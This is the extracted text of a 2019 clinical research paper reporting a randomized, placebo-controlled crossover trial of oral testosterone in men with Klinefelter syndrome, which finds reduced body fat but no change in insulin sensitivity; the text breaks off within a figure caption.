work_pldccdah4jaxfnfnhw7476klzi ---- 8:9 1250–1261C Høst et al. Testosterone in Klinefelter syndrome RESEARCH A placebo-controlled randomized study with testosterone in Klinefelter syndrome: beneficial effects on body composition Christian Høst1,2, Anders Bojesen3, Mogens Erlandsen4, Kristian A Groth5, Kurt Kristensen2, Anne Grethe Jurik6, Niels H Birkebæk2 and Claus H Gravholt1,5 1Department of Endocrinology and Internal Medicine and the Medical Research Laboratories, Clinical Institute, Aarhus University Hospital, Aarhus N, Denmark 2Department of Pediatrics, Aarhus University Hospital, Aarhus N, Denmark 3Department of Clinical Genetics, Aarhus University Hospital, Aarhus N, Denmark 4Section for Biostatistics, Department of Public Health, Aarhus University, Aarhus C, Denmark 5Department of Molecular Medicine, Aarhus University Hospital, Aarhus N, Denmark 6Department of Radiology, Aarhus University Hospital, Aarhus N, Denmark Correspondence should be addressed to C H Gravholt: ch.gravholt@dadlnet.dk Abstract Context and objective: Males with Klinefelter syndrome (KS) are typically hypogonadal with a high incidence of metabolic disease, increased body fat and mortality. Testosterone treatment of hypogonadal patients decrease fat mass, increase lean body mass and improve insulin sensitivity, but whether this extends to patients with KS is presently unknown. Research design and methods: In a randomized, double-blind, placebo-controlled, BMI- matched cross-over study, 13 males with KS (age: 34.8 years; BMI: 26.7 kg/m2) received testosterone (Andriol®) 160 mg per day (testosterone) or placebo treatment for 6 months. Thirteen age- and BMI-matched healthy controls were recruited. DEXA scan, abdominal computed tomography (CT) scan and a hyperinsulinemic–euglycemic clamp, muscle strength and maximal oxygen uptake measurement were performed. Results: Total lean body mass and body fat mass were comparable between testosterone- naïve KS and controls using DEXA, whereas visceral fat mass, total abdominal and intra-abdominal fat by CT was increased (P < 0.05). Testosterone decreased total body fat (P = 0.01) and abdominal fat by CT (P = 0.04). Glucose disposal was similar between testosterone-naïve KS and controls (P = 0.3) and unchanged during testosterone (P = 0.8). Free fatty acid suppression during the clamp was impaired in KS and maximal oxygen uptake was markedly lower in KS, but both were unaffected by treatment. Testosterone increased hemoglobin and IGF-I. Conclusion: Testosterone treatment in adult males with KS for 6 months leads to favorable changes in body composition with reductions in fat mass, including abdominal fat mass, but does not change measures of glucose homeostasis. Introduction Klinefelter syndrome (KS, 47,XXY) is the most common sex chromosomal disorder with a prevalence of 1 in 660 men (1, 2). Classically, the KS phenotype is characterized by eunuch body proportions, increased height and hypergonadotropic hypogonadism (3). The incidence of the metabolic syndrome and insulin resistance is considerably higher in patients with KS (4, 5), and epidemiological studies show an increased mortality -19-0323 Key Words f Klinefelter syndrome f testosterone f body composition f rare diseases/syndromes f insulin sensitivity ID: 19-0323 8 9 Endocrine Connections (2019) 8, 1250–1261 This work is licensed under a Creative Commons Attribution-NonCommercial-NoDerivatives 4.0 International License. https://doi.org/10.1530/EC-19-0323 https://ec.bioscientifica.com © 2019 The authors Published by Bioscientifica Ltd Downloaded from Bioscientifica.com at 04/06/2021 04:58:13PM via free access mailto:ch.gravholt@dadlnet.dk https://creativecommons.org/licenses/by-nc-nd/4.0/ https://creativecommons.org/licenses/by-nc-nd/4.0/ https://creativecommons.org/licenses/by-nc-nd/4.0/ https://doi.org/10.1530/EC-19-0323 https://ec.bioscientifica.com C Høst et al. Testosterone in Klinefelter syndrome 1251 PB–12 8:9 due to diabetes as well as diseases of the cardiovascular, respiratory and digestive systems (6). The association between KS and diabetes was first reported in 1969, with 39% of patients with KS having a diabetic oral glucose tolerance test (7). Others have described decreased insulin sensitivity, with increased fasting insulin levels (8). At the same time cross-sectional studies have shown an inverse relationship between plasma testosterone and insulin resistance in normal males (9). We previously found that the increased occurrence of insulin resistance and diabetic glucose tolerance testing among males with KS, translates into an increased frequency of type 2 diabetes among patients with KS, which are often hypogonadal (10). Among normal males, hypogonadism is also more prevalent among patients with type 2 diabetes than in age-matched controls (9), which could indicate a bi-directional relationship between testosterone and diabetes. This effect is less pronounced (11) or even absent (4, 12) when one takes into account BMI or waist-to-hip ratio. This lack of an association between testosterone and diabetes, when adding BMI or the amount of body fat into the equation, begs the question whether the association between testosterone and type 2 diabetes is through adiposity rather than testosterone itself, not forgetting the distinct genetic background present in KS with an additional X chromosome. It has been shown that treatment with testosterone in hypogonadal patients with type 2 diabetes improves insulin sensitivity in obese patients (13), but not in lean patients (14). Which point toward the fact that changes in insulin sensitivity during therapy largely depend on the amount of ‘modifiable fat’, especially visceral fat. Studies on male hypogonadal patients of different etiologies have shown an increase in muscle mass and a decreased fat mass following 6-month testosterone treatment (15) and that withdrawal of testosterone supplementation for just 14 days lead to lower insulin sensitivity (16). However, the genetic make-up of males with KS is unique and one study found that increased insulin resistance in KS was related to gene dosage of the CSF2RA gene located on both the X and Y chromosome (17). Also higher leptin levels in KS compared with controls were not lowered after 3 months of testosterone treatment (18), and finally, it has been suggested that overproduction of CCL2, a small chemokine expressed at sites of inflammation and associated with insulin resistance, could explain insulin resistance in KS (19). Recently, we found profound changes in the methylation and RNA expression pattern throughout the genome among males with KS and enrichment analyses showed that the observed methylation changes was related to development of diabetes (20). The present study is the first randomized placebo- controlled study to investigate the effects of testosterone treatment on insulin sensitivity, body composition, muscle strength and maximal oxygen uptake in patients with KS using gold standard methods. We hypothesized that testosterone treatment would improve insulin sensitivity and body composition. Materials and methods Subjects Twenty males with KS were included in the study. Men with KS were recruited from the outpatient clinic at the Department of Endocrinology and Internal Medicine at Aarhus University Hospital. Inclusion criteria were age above 18 years with verified KS karyotype. Exclusion criteria were BMI above 35 kg/m2 or below 20 kg/m2, diabetes, history of malignant disease, prostate-specific antigen above 4 ng/mL, symptomatic heart disease, familial history of thromboembolic conditions, clinical hepatic disease (alanine aminotransferase more than four times above upper limit value), known allergic condition toward the medicine used in the project, heavy smoking (more than 30 cigarettes a day), alcoholism (more than 21 units of alcohol per week), severe mental illness or any other condition with a known influence on the investigated parameters. Most males with KS had received testosterone treatment before entering the study, while a few were testosterone naïve at inclusion. During the study one was excluded due to a high serum testosterone. Four withdrew their informed consent, and two withdrew their consent to participate due to side effects of the study medication, which was perceived to be normal effects of testosterone by the study investigators. Thus the final study group consisted of 13 patients (age: 34.8 (22–56 years); BMI: 26.7 ± 8.8 (kg/m2)) with cytogenetically verified KS. The control group consisted of 13 age- (age: 34.8 (21–53) years) and BMI-matched (27.0 ± 6.9 (kg/m2)) healthy controls, which were recruited through advertisement on the Internet. Before study start, participants (KS and controls) were screened and a complete physical examination was performed. All volunteers received oral and written information prior to giving written, informed consent. The study was conducted from 2005 to 2012. The protocol was approved by the Region Midt Ethical Scientific This work is licensed under a Creative Commons Attribution-NonCommercial-NoDerivatives 4.0 International License. https://doi.org/10.1530/EC-19-0323 https://ec.bioscientifica.com © 2019 The authors Published by Bioscientifica Ltd Downloaded from Bioscientifica.com at 04/06/2021 04:58:13PM via free access https://creativecommons.org/licenses/by-nc-nd/4.0/ https://creativecommons.org/licenses/by-nc-nd/4.0/ https://creativecommons.org/licenses/by-nc-nd/4.0/ https://doi.org/10.1530/EC-19-0323 https://ec.bioscientifica.com C Høst et al. Testosterone in Klinefelter syndrome 12528:9 Committee (#20030077) and performed in accordance with the Helsinki Declaration II. Study design The study was a 12-month randomized, double-blinded, placebo-controlled, cross-over study without a washout period (Fig. 1). Randomization was performed in blocks of six in order to ensure equal numbers in each group, and by an independent body. Study days consisted of two coupled days; Day 1 or ‘metabolic day’ and Day 2, allocated for DEXA estimation of body composition, CT measuring the amount of intra-abdominal (visceral) fat mass, a VO2max test, muscle strength and 24-h ambulatory blood pressure measurement (AMBP) (Fig. 1). The KS group was randomized to either testosterone in the form of Andriol® (testosterone undecanoat) or placebo treatment and subsequently crossed over. The Andriol® dose was 160 mg/day divided in two doses of 80 mg and participants were instructed to ingest the medicine with a fatty meal. Compliance was measured by counting the remaining pills after every 6-month period. The control group did not receive any treatment and was examined once. The KS group was examined before and after each 6-month period. KS participants received their last tablet the evening before the examinations. Three days before the study, volunteers were instructed not to participate in heavy physical exercise or to drink alcoholic beverages. After an overnight fast (>10 h) subjects were admitted to the clinical research unit and confined to bed. Hyperinsulinemic euglycemic clamp At 08:00 h (t = −180 min) a catheter was placed into an antecubital vein for infusion of saline to maintain catheter patency. Another catheter was inserted into a vein on the contralateral hand and kept in a thermo-regulated heating box (60°C) for sampling of arterialized venous blood. After collection of baseline blood samples, plasma was collected for metabolites at t = 0, 150, 165 and 180 min. At t = 0 min, a 3-h infusion of human insulin (Actrapid; Novo Nordisk A/S) commenced (1.0 mU/kg total body mass/min). Plasma glucose was measured every 10 min and clamped at 5 mmol/L by a variable infusion of 20% glucose. The glucose infusion rate during the last hour of the clamp (M value) was used as an index of insulin sensitivity. Insulin and metabolite concentrations were determined every 60 min. Respiratory exchange rates (RQ) and total energy expenditure (EE) were calculated from indirect calorimetry (Deltatrac; Datex Instrumentarium, Helsinki, Finland) and urea excretion. Oxidation rates of Screening Inves�ga�ons Testosterone treatment Placebo treatment Placebo treatment Testosterone treatment Inves�ga�ons Blood samples Indirect calorimetry -120 120600-60 180 240 300 Day 1: Hyperinsulinemic euglycemic clampInsulin 1 mU/kg/min Day 2: MicrodialysisMeasurement of glucose, lactate and glycerol 1. DEXA scan with determina�on of body composi�on 2. CT slice – intraabdominal fat 3. VO2-max tes�ng 4. Muscle strength determina�on 5. 24 hour blood pressure measurement Figure 1 Outline of the study design and the two separate study days. This work is licensed under a Creative Commons Attribution-NonCommercial-NoDerivatives 4.0 International License. https://doi.org/10.1530/EC-19-0323 https://ec.bioscientifica.com © 2019 The authors Published by Bioscientifica Ltd Downloaded from Bioscientifica.com at 04/06/2021 04:58:13PM via free access https://creativecommons.org/licenses/by-nc-nd/4.0/ https://creativecommons.org/licenses/by-nc-nd/4.0/ https://creativecommons.org/licenses/by-nc-nd/4.0/ https://doi.org/10.1530/EC-19-0323 https://ec.bioscientifica.com C Høst et al. Testosterone in Klinefelter syndrome 1253 PB–12 8:9 glucose was calculated based on non-protein EE and RQ (21). Indirect calorimetry was performed from t = −30 to t = 0 min and from t = 150 to t = 180 min. At 180 min, all catheters were removed and plasma glucose stabilized and the participants had lunch and were discharged. Analytical techniques Plasma glucose was analyzed in duplicate using the glucose oxidase method (Beckman Coulter). Measurements were performed immediately during the study. Insulin was measured with an immunoassay (DAKO). HOMA2 calculator was downloaded from https://www.dtu.ox.ac. uk/homacalculator/. Plasma glucagon was measured by a RIA (22). Testosterone, DHEAS, androstenedione and 17-hydroxy-progesterone were measured by liquid- chromatography tandem mass spectrometry. The limit of detection for testosterone was 0.1 nmol/L, and the working ranges were 0.2–100 nmol/L. The working range was assessed from the precision profile, and defined as the concentration in which the coefficient of variation (CV) was <10%. Sex hormone-binding globulin, FSH and LH were analyzed on the Architect i2000 platform (Abbott) by chemiluminescent micro particle immunoassay method using the corresponding kits. The working ranges were 0.1–250 nmol/L, 0.05–150 IE/L and 0.07-250 IE/L, respectively. Serum IGF-1 was measured by noncompetitive TR-IFMA and serum IGFBP-3 was measured by an immunoradiometric assay (IRMA) (Diagnostic System Laboratories Inc.). C-reactive protein (CRP) was measured by a high-sensitive CRP TR-IFMA with a detection limit of 0.1 μg/L. Plasma lipids and triglycerides were measured using an automated commercially available system (Aeroset, Abbott Diagnostics, Abbott Park Laboratories). The CV was <5%. Serum FFA was determined by a colorimetric method using a commercial kit (Wako Chemicals). Body composition, maximal aerobic capacity and 24-h ambulatory blood pressure measurement Body weight was measured on trial day before confinement to bed (with the participants wearing underwear) to the nearest 0.1 kg, height was measured to the nearest 0.5 cm at inclusion and BMI was calculated. On the following day we measured total and regional fat mass (g) and lean body mass (g) by dual X-ray densitometry (DEXA) using a Hologic 2000/w osteodensitometer (Hologic, Waltham, MA, USA). The system software provided the mass of lean body, fat and bone mineral for the whole body and specific regions. Appendicular, trunk and visceral trunk fat mass and trunk and appendicular lean body mass were extracted. The CV for the DEXA scans was <2% as estimated by repeated measurements (23). The amount of intra-abdominal (visceral) fat was evaluated by CT with a Somatom Plus-S scanner (Siemens). The subjects were studied in the supine position. The areas scanned comprised 6 and 12 mm cross-sectional slices at the umbilicus using 120 kV and 330 mAs. The same technician performed all the scans, which subsequently were analyzed by the same radiologist (AGJ). Then a 6-min submaximal exercise test with continuous monitoring of heart rate was performed on a bicycle ergometer (Monark Ergometric 829 E, Monark Exercise, Varberg, Sweden). We used a workload of 300–1200 kpm/min, depending on age and reported physical activity by the subject, and maximal aerobic capacity (VO2max) was calculated (24) based on extrapolation of heart rate, age of the participant and weight. The isometric strength of the right biceps and quadriceps muscles was assessed on Day 2 by means of a dynamometer (Good strength, Metitur Ltd, Jyväskylä, Finland), which electronically measures the isometric muscle functions in the upper and lower limbs. The strength was calculated as the mean of three voluntary maximum isometric contractions separated by 1 min intervals. All the participants, KS and controls, underwent 24-h AMBP using an automatic portable apparatus (Spacelabs 90207, Redmond, Washington, USA) at the end of the examination program. The apparatus used an oscillometric method of BP measurement. An appropriate cuff size placed on the left arm was used and readings were obtained every 20 min for a period of 24 h on a normal weekday. Time of bed and time of rise in the morning was noted by the participant. Microdialysis After application of a local analgesic (Lidocaine), microdialysis catheters (CMA-60; CMA, Stockholm, Sweden) were inserted in subcutaneous adipose tissue in the periumbilical region. The microdialysis catheters have a molecular cutoff of 20 kDa and a membrane length of 30 mm and were perfused at a flow rate of 1 mL/min using CMA-107 perfusion pumps (CMA). Changes in interstitial glycerol concentration can be taken as an index of lipolysis (25). Glycerol, glucose and lactate in the microdialysis dialysate was measured in duplicate by an automated spectrophotometric kinetic enzymatic analyzer (CMA-600). This work is licensed under a Creative Commons Attribution-NonCommercial-NoDerivatives 4.0 International License. https://doi.org/10.1530/EC-19-0323 https://ec.bioscientifica.com © 2019 The authors Published by Bioscientifica Ltd Downloaded from Bioscientifica.com at 04/06/2021 04:58:13PM via free access https://www.dtu.ox.ac.uk/homacalculator/ https://www.dtu.ox.ac.uk/homacalculator/ https://creativecommons.org/licenses/by-nc-nd/4.0/ https://creativecommons.org/licenses/by-nc-nd/4.0/ https://creativecommons.org/licenses/by-nc-nd/4.0/ https://doi.org/10.1530/EC-19-0323 https://ec.bioscientifica.com C Høst et al. Testosterone in Klinefelter syndrome 12548:9 Statistics All standard statistical calculations were performed using SPSS for Windows version 18.01 (SPSS Inc.). Data were checked for normality with Kolmogorov–Smirnov’s test and by plotting. Comparisons between groups were done with Student’s unpaired t-test or the Mann–Whitney U test, as appropriate. The development over time during the clamp in different analytes was analyzed with mixed models, as detailed below. We first compared placebo- treated KS with controls, and then we compared the effect of treatment (placebo or testosterone) within the KS group. The comparison of the treated KS and the controls was based on a test for interaction between the group and time factors, i.e. a test for parallel time curves. The effect of treatment within the KS group was based on a mixed model on the differences at each time point for each individual. Due to inhomogeneity between the standard deviations at different time points and also between the treated KS and the controls, we used mixed models with unstructured covariance matrices and Satterthwaite approximation when calculating P values with SAS/STAT 15.1 PROC MIXED (SAS Institute Inc. 2018. SAS/STAT® 15.1 User’s Guide. Cary, NC: SAS Institute Inc. at http:// support.sas.com). We used a per-protocol analysis approach and thus not included the drop-outs in the final analysis. Data are shown as mean ± s.d. or median (range). P values <0.05 were regarded as statistically significant. Results Characteristics of study subjects and body composition during treatment At baseline, males with KS and controls were similar on most body anthropometric composition measures (Table 1). Placebo-treated KS had greater total and intra- abdominal fat mass (P ≤ 0.001) and lower lumbar bone mineral density (P = 0.02) (Table 2) compared with controls at the end of the study. Testosterone treatment did not affect crude measures of body composition compared to baseline in males with KS, but weight, BMI, hip and waist circumference increased significantly during placebo treatment (Table 1). After 6 months, no difference was observed regarding the same measures comparing testosterone and placebo-treated men with KS (Table 1). However, abdominal fat and total body fat was higher in placebo versus testosterone-treated KS patients evaluated both by DEXA and CT (P ≤ 0.05 for all, Table 2). Total lean body mass increased during testosterone compared with placebo treatment, approaching statistical significance. Two participants dropped out of the study due to perceived side effects. These side effects were not considered to be serious. There were no other reported side effects. Insulin sensitivity and circulating metabolites Insulin sensitivity was similar in placebo-treated KS and controls (Fig. 2), while HOMA-IR tended to be higher (P = 0.06). Glucagon, insulin and FFA showed a similar curvature in KS and controls during the clamp (non-significant interaction term group * time, P values not shown). Glucagon and insulin levels were similar in placebo-treated KS and controls during basal (P = 0.7 and P = 0.2, respectively) (Fig. 3) and during the entire clamp, including hyperinsulinemic circumstances (P = 0.2 and P = 0.2, respectively), whereas FFA levels were not suppressed to similar levels among males with KS (P = 0.0002) (Fig. 3). IGFBP3, but not IGF-1, was higher in placebo-treated KS as compared to controls (Table 2). CRP was also similar between placebo-treated KS and controls. Testosterone treatment did not affect insulin sensitivity in KS (P = 0.6) (Fig. 2) or HOMA-IR (P = 0.8). Insulin and FFA levels were similar in placebo-treated and testosterone-treated KS during basal (P = 0.4 and P = 0.7) and hyperinsulinemic circumstances (P = 0.4 and P = 0.1) (Fig. 3). Glucagon was similar at baseline (P = 0.5), but slightly lower during testosterone treatment (P = 0.04). IGF-I (P < 0.03), but not IGFBP3 (P = 0.2), was higher among testosterone-treated KS compared with placebo (Fig. 3). Sex hormones, gonadotrophins, hemoglobin and hematocrit Testosterone and hemoglobin was lower in placebo-treated KS compared with controls, while levels of LH and FSH were higher, whereas levels of SHBG, 17-OH progesterone, DHEAS and androstenedione were comparable (Table 2). Testosterone, LH and FSH levels were comparable between placebo and testosterone-treated KS patients, whereas SHBG levels were suppressed by testosterone treatment in KS (Table 2). Likewise, androstenedione levels were comparable, whereas 17-OH progesterone and DHEAS were higher in placebo versus testosterone-treated KS (Table 2). Hemoglobin was higher during testosterone treatment (Fig. 3), while levels of total cholesterol, LDL cholesterol, HDL cholesterol, triglycerides and alanine aminotransferase were unchanged. This work is licensed under a Creative Commons Attribution-NonCommercial-NoDerivatives 4.0 International License. https://doi.org/10.1530/EC-19-0323 https://ec.bioscientifica.com © 2019 The authors Published by Bioscientifica Ltd Downloaded from Bioscientifica.com at 04/06/2021 04:58:13PM via free access http://support.sas.com http://support.sas.com https://creativecommons.org/licenses/by-nc-nd/4.0/ https://creativecommons.org/licenses/by-nc-nd/4.0/ https://creativecommons.org/licenses/by-nc-nd/4.0/ https://doi.org/10.1530/EC-19-0323 https://ec.bioscientifica.com C Høst et al. Testosterone in Klinefelter syndrome 1255 PB–12 8:9 Resting EE, physical fitness and muscle strength Resting EE was similar between placebo-treated KS and controls during basal and hyperinsulinemic circumstances (results not shown), and likewise, muscle strength was also similar, although numerically lower among placebo- treated KS (Table 2). VO2max was markedly lower in placebo-treated KS compared to controls (P = 0.004). Resting EE and RQ during basal and hyperinsulinemic circumstances was unaffected by testosterone treatment (all P > 0.7). VO2max was only marginally affected by testosterone treatment (P = 0.12), while muscle strength in biceps and quadriceps muscle were comparable between groups (Table 2). Microdialysis Interstitial concentrations of glucose Baseline levels of interstitial glucose (mmol/L) in abdominal adipose tissue were comparable between placebo-treated KS and controls (4.83 ± 0.98 vs 5.16 ± 1.22, respectively, interstitial concentrations of lactate, P = 0.55), and there were no effects over time (P = 0.3 and P = 0.68, basal and clamp periods, respectively). Baseline concentrations did not differ between placebo and testosterone-treated KS (4.83 ± 0.98 vs 5.09 ± 2.66, P = 0.8), and no change was seen with time (P = 0.15 and P = 0.49, basal and clamp periods, respectively). Interstitial concentrations of glycerol Baseline concentrations of interstitial glycerol (µmol/L) in abdominal adipose tissue was marginally higher among KS compared with controls (445 ± 297 vs 287 ± 108, respectively, P = 0.08). There were no effects over time (P = 0.8 and P = 0.7, basal and clamp periods, respectively). Likewise there was no difference between placebo and testosterone-treated KS (445 ± 297 vs 479 ± 251, P = 0.7), and no effect over time (P = 0.3 and P = 0.8 basal and clamp periods, respectively). Interstitial concentrations of lactate Baseline concentrations of interstitial lactate (mmol/L) in abdominal adipose tissue did not differ between placebo- treated KS and controls (2.38 ± 0.67 vs 2.1 ± 1.1, P = 0.4). There was no difference over time (P = 0.1 and P = 0.6, basal and clamp periods, respectively). There was no difference between placebo and testosterone-treated KS (2.38 ± 0.67 vs 2.86 ± 1.5, P = 0.3), and no effect over time for the comparison (P = 0.3 and P = 0.09, basal and clamp periods, respectively). 24-h ambulatory blood pressure No differences between placebo- and testosterone-treated KS patients were detected with respect to any measures from 24-h AMBP. Likewise, no differences was seen between placebo-treated KS and controls (Table 2). Discussion This study, to our knowledge, is the first randomized trial of testosterone and placebo in KS studying insulin sensitivity, metabolism, body composition, muscle strength and maximal oxygen uptake. The principal results demonstrate distinct effects of testosterone on body composition, especially reductions in abdominal fat mass and total body fat during a 6-month course of testosterone treatment in KS. Testosterone treatment, on the other hand, did not change glucose homeostasis, circulating levels of free fatty acids or other measures of intermediate metabolism, but we speculate that longer Table 1 Age of participants, anthropometric data at baseline in males with Klinefelter syndrome and controls at baseline. Klinefelter syndrome (mean ± s.d.) Control (mean ± s.d.) P value Age (years) 34.8 ± 20.2 35 ± 20 1.00 Height (cm) 184 ± 15 182 ± 13 0.3 Weight (kg) 91 ± 15 89 ± 16 0.8 BMI (kg/m2) 27 ± 9 27 ± 7 0.9 Baseline Testosterone Baseline vs testosterone Placebo Baseline vs placebo Testosterone vs placebo Weight (kg) 91 ± 15 91 ± 14 0.4 93 ± 16 0.03 0.2 BMI (kg/m2) 27 ± 5 27 ± 5 0.3 28 ± 5 0.03 0.2 Hip (cm) 95 ± 11 97 ± 7 0.2 99 ± 9 0.01 0.2 Waist (cm) 101 ± 17 104 ± 11 0.2 106 ± 14 0.01 0.4 In the lower part of the table anthropometric data at baseline and during treatment with either placebo or testosterone in Klinefelter syndrome is presented. This work is licensed under a Creative Commons Attribution-NonCommercial-NoDerivatives 4.0 International License. https://doi.org/10.1530/EC-19-0323 https://ec.bioscientifica.com © 2019 The authors Published by Bioscientifica Ltd Downloaded from Bioscientifica.com at 04/06/2021 04:58:13PM via free access https://creativecommons.org/licenses/by-nc-nd/4.0/ https://creativecommons.org/licenses/by-nc-nd/4.0/ https://creativecommons.org/licenses/by-nc-nd/4.0/ https://doi.org/10.1530/EC-19-0323 https://ec.bioscientifica.com C Høst et al. Testosterone in Klinefelter syndrome 12568:9 term testosterone treatment would lead to greater changes in body composition and reductions in visceral fat, and in turn eventually increase insulin sensitivity. The reductions in fat mass was accompanied by other testosterone-responsive changes, such as an increase in hemoglobin and IGF-I, reductions in SHBG and discrete changes in adrenal androgens such as 17-hydroxy progesterone and DHEAS, but not androstenedione, showing that active testosterone treatment influences adrenal steroidogenesis in a specific manner (26). Although hemoglobin increased significantly among males with KS during active treatment, the level was still somewhat lower than among controls. The testosterone-induced increase in hemoglobin seems to occur via increased erythropoietin and decreased ferritin and hepcidin (27). Due to the design of the study with withdrawal of study medication the day before examinations, we saw no changes in testosterone, LH and FSH. Previously, short-term testosterone gel treatment (90 days) of hypogonadal men of different etiologies resulted in increments in lean body mass and reductions in fat mass measured by DEXA. The changes occurred in Table 2 Body composition determined by CT and DEXA, muscle strength, androgens and other hormones, lipids, 24-h ambulatory blood pressure measurements (mmHg), and VO2max in males with Klinefelter syndrome during testosterone or placebo treatment and in controls. Placebo Testosterone P value Controls P value placebo vs testosterone placebo vs controls CT Total abdominal fat cm3 533 ± 408 495 ± 366 0.04 194 ± 142 <0.001 Intra-abdominal fat cm3 233 ± 163 223 ± 166 0.5 82 ± 79 <0.001 Ratio visceral vs total fat 0.46 ± 0.12 0.46 ± 0.13 0.4 0.43 ± 0.17 0.4 DEXA Total body fat (kg) 26.8 ± 16.8 24.6 ± 15.3 0.01 21.3 ± 15.2 0.1 Abdominal fat (kg) 7.8 ± 5.8 7.2 ± 5.1 0.05 5.4 ± 4.6 0.06 Abdominal lean body mass (g) 16.6 ± 4.9 17.0 ± 4.3 0.5 15.7 ± 3.5 0.3 Abdominal total mass (g) 24.7 ± 10.6 24.3 ± 8.9 0.4 21.4 ± 8.1 0.1 Abdominal fat (%) 29.9 ± 14.9 28.1 ± 16.8 0.03 24.5 ± 11.1 0.1 Visceral fat (g) 3.5 ± 2.4 3.3 ± 2.3 0.2 2.3 ± 1.9 0.05 Total body lean mass (g) 61.1 ± 12.1 62.1 ± 10.7 0.09 64.0 ± 13.0 0.4 Total lumbar BMD (g/cm2) 0.98 ± 0.29 0.98 ± 0.27 0.5 1.11 ± 0.23 0.02 Total hip BMD (g/cm2) 0.99 ± 0.16 0.99 ± 0.19 0.7 1.07 ± 0.22 0.1 Muscle strength Arm – right biceps (Nm) 300 ± 41 301 ± 50 0.9 322 ± 49 0.08 Leg – right quadriceps (Nm) 557 ± 121 556 ± 140 1.0 627 ± 115 0.2 Bio-chemistry Testosterone (nmol/L) 10.2 ± 5.5 8.5 ± 4.1 0.2 17.4 ± 5.0 0.002 DHEAS (nmol/L) 4.7 ± 2.3 4.0 ± 1.8 0.02 5.9 ± 3.2 0.3 17-Hydroxy-progesterone (nmol/L) 2.5 ± 1.3 1.8 ± 1.0 0.02 2.8 ± 1.2 0.5 Androstenedione (nmol/L) 2.9 ± 1.0 2.8 ± 0.8 0.7 3.5 ± 1.5 0.3 LH (IU/L) 19.6 ± 5.1 19.1 ± 5.2 0.7 4.0 ± 1.4 <0.0001 FSH (IU/L) 36.9 ± 9.1 35.7 ± 11.2 0.4 3.9 ± 1.6 <0.0001 SHBG (nmol/L) 31.6 ± 13.8 24.5 ± 10.6 0.001 30.3 ± 9.6 0.8 Hemoglobin (mmol/L) 8.7 ± 0.6 9.0 ± 0.6 0.05 9.6 ± 0.6 0.001 IGF-I (µg/L) 163 ± 51 178 ± 47 0.03 165 ± 54 0.9 IGFBP-3 (µg/L) 4329 ± 794 4155 ± 710 0.2 3707 ± 397 0.02 CRP (mg/L) 1.7 ± 1.7 2.1 ± 2.3 0.3 1.6 ± 1.6 1.0 Total cholesterol (mmol/L) 4.7 ± 0.7 4.6 ± 0.8 0.6 4.9 ± 0.9 0.4 LDL cholesterol (mmol/L) 2.7 ± 0.8 2.7 ± 1.0 1.0 2.8 ± 1.1 0.9 HDL cholesterol (mmol/L) 1.3 ± 0.4 1.2 ± 0.6 0.4 1.3 ± 0.3 0.9 Triglycerides (mmol/L) 1.3 ± 0.8 1.5 ± 0.6 0.4 1.3 ± 0.5 0.9 Alanine aminotransferase (U/L) 36 ± 23 27 ± 11 0.1 42 ± 32 0.5 Blood Pressure Day systolic AMBP 125 ± 13 129 ± 9 0.2 129 ± 10 0.4 Night systolic AMBP 112 ± 12 113 ± 11 0.8 114 ± 10 0.7 24-h systolic AMBP 122 ± 9 124 ± 9 0.2 125 ± 8 0.4 Day diastolic AMBP 77 ± 9 82 ± 13 0.8 80 ± 9 0.4 Night diastolic AMBP 66 ± 10 65 ± 10 0.8 65 ± 10 0.9 24-h diastolic AMBP 74 ± 7 75 ± 7 0.4 76 ± 9 0.6 Exercise capacity VO2max (mL O2/kg/min) 33.1 ± 7.3 31.3 ± 7.4 0.1 45.2 ± 6.6 0.004 This work is licensed under a Creative Commons Attribution-NonCommercial-NoDerivatives 4.0 International License. https://doi.org/10.1530/EC-19-0323 https://ec.bioscientifica.com © 2019 The authors Published by Bioscientifica Ltd Downloaded from Bioscientifica.com at 04/06/2021 04:58:13PM via free access https://creativecommons.org/licenses/by-nc-nd/4.0/ https://creativecommons.org/licenses/by-nc-nd/4.0/ https://creativecommons.org/licenses/by-nc-nd/4.0/ https://doi.org/10.1530/EC-19-0323 https://ec.bioscientifica.com C Høst et al. Testosterone in Klinefelter syndrome 1257 PB–12 8:9 a dose-dependent fashion, but with increments in lean body mass only occurring with testosterone levels in the higher normo-physiological range (15). Woodhouse et al. studied experimental hypogonadism and 20-week graded testosterone enanthate treatment (28). Here, low physiological testosterone levels were associated with gains in subcutaneous, intermuscular and intra-abdominal adipose tissue, whereas testosterone levels in the normo- to supra-physiolgical range of 18.8–87.9 nmol/L increased lean body mass and reduced subcutaneous fat mass, but not total body fat or intra-abdominal fat mass (28). Our results are in line with the latter study, since only subcutaneous abdominal and total body fat, but not intra-abdominal fat mass was reduced during testosterone treatment. Although lean body mass, physical fitness and maximal muscle strength increased nominally, these changes were not statistically significantly affected by treatment in this study, perhaps because of a limited study sample. Notably, males with KS had much lower exercise capacity as evaluated by measurement of VO2max, as also previously documented in observational studies (26, 29). Of note, we saw nominal increases in weight and BMI from baseline through both treatment arms. Albeit only significant for the comparison with the placebo arm, these data underline the deleterious body compositional effects of a continuous hypogonadal milieu in these patients. In young boys with KS (4–12 years of age), treatment with oxandrolone, a non-aromatizable androgen not converted to estradiol, also led to lower body fat as measured by skin fold caliper (30). In a previous study among 70 males with KS we described a high incidence of the metabolic syndrome and insulin resistance compared with an age-matched control group. About 50% of KS patients fulfilled the criteria for the metabolic syndrome, compared with 10% among controls (4, 31). Similar findings were later reported by Ishikawa et al. (5). In the current study, testosterone treatment had no effect on insulin-mediated glucose disposal (M value) or insulin sensitivity as expressed by HOMA-IR index, although a trend toward higher HOMA-IR was detected in placebo-treated KS compared to controls (P = 0.06). Of note, the males with KS studied here were not overtly obese, but overweight. In an uncontrolled setup, 18-month testosterone treatment in a group of males with KS with similar body composition was shown to improve HOMA-IR without changing BMI or waist circumference (32). In that study, however, HOMA-IR values were markedly higher than here (2.8 ± 1.7 vs 1.3 ± 1.0, respectively for placebo treated KS), and unfortunately, no data on regional body composition BMI (kg/m2) 15 20 25 30 35 40 P=0.3 P=0.8 Total abdom inal fat by CT (cm 3) 0 200 400 600 800 1000 1200 P<0.001 P=0.04 Testosterone Intraabdominal fat by CT (cm3) 0 100 200 300 400 500 Placebo Controls P=0.5 P<0.001 Placebo M -v a lu e (m g /k g L B M /m in ) 0 2 4 6 8 10 12 14 16 18 Testosterone Controls Figure 2 (A) BMI, total and intra-abdominal fat in males with Klinefelter syndrome and controls. Under figure: Open circles indicate placebo-treated Klinefelter syndrome, closed circles indicate testosterone-treated Klinefelter syndrome and open squares indicate controls. P values are indicated in the figure. (B) Insulin sensitivity in males with Klinefelter syndrome and controls. Under figure: Round circles 